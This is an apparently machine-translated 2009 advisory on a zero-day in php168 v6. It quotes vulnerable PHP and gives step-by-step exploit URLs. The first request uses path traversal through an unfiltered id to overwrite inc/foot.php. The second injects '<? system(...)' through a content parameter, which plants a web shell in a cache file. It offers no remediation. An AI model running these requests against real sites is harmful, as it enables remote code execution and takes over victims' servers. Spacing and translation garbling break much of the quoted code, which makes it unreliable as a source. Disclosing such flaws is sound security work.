php168v6 getshell 0day-vulnerability warning-the black bar safety net

ID MYHACK58:62200925749
Type myhack58
Reporter 佚名
Modified 2009-12-27T00:00:00


SEBUG-Appdir:Php168 Published:2009-12-26 Affected version: php168 v6. 0 vulnerability description: The two-step first do/jsarticle. php file if(! eregi("^(hot|com|new|lastview|like|pic)$",$type)){ die("Type Error"); } $FileName=dirname(FILE)."/../ cache/jsarticle_cache/"; if($type==’like’){ $FileName.= floor($id/3 0 0 0)."/"; }else{ unset($id); }

$FileName.=" {$type}{$fid}{$id}. php"; .................. if(! is_dir(dirname($FileName))){ makepath(dirname($FileName)); } if( (time()-filemtime($FileName))>($webdb["cache_time_$type"]*6 0) ){ write_file($FileName,"<? php \r\n\$show=stripslashes(’". addslashes($show)."’); ?& gt;");

//write_file cover the top of any php file! Because id not filtered


The second do/bencandy. php file require_once(dirname(FILE)."/"." global.php"); !$ aid && $aid = intval($id); $id = $aid; $page<1 && $page=1;

$min=intval($page)-1; $erp=$Fid_db[iftable][$fid]?$ Fid_db[iftable][$fid]:’; $rsdb=$db->get_one("SELECT R.,A. FROM {$pre}article$erp A LEFT JOIN {$pre}reply$erp R ON A. aid=R. aid WHERE A. aid=$aid ORDER BY R. topic DESC,R. orderid ASC LIMIT $min,1");

if(!$ rsdb){ showerr("data does not exist!"); }elseif($fid!=$ rsdb[fid]){ showerr("FID error"); }

if(!$ jobs&&$webdb[bencandy_cache_time]&&(time()-filemtime($Cache_FileName))>($webdb[bencandy_cache_time]*6 0)){

if(! is_dir(dirname($Cache_FileName))){ makepath(dirname($Cache_FileName)); } $content.="& lt;SCRIPT LANGUAGE=’JavaScript’ src=’$webdb[www_url]/do/job. php? job=updatehits&aid=$id’></SCRIPT>"; write_file($Cache_FileName,$content); //note here write the file. }elseif($jobs==’show’){ @unlink($Cache_FileName); } Here probably a problem also almost figured it out, we look at$content in fact it is done initializing, look you can see the require(PHP168_PATH."inc/foot.php");this way, the initialization is here, we use the first issue, the cover of this document's content, next we can directly submit the$content variable is injected shell code!& lt;reference > Test method: [] This site provides program(method)may carry offensive,for security research and teaching purposes,at your own risk! do/jsarticle. php? type=like&id=xhming/../../../../inc/foot do/bencandy. php? fid=4&id=5 8 2&content=<? system($xhming);phpinfo()?& gt; cache/bencandy_cache/0/582_1.php //remember the id value, since there is the cache and the time to determine each step to be SEBUG Safety recommendations: No// [2009-12-26]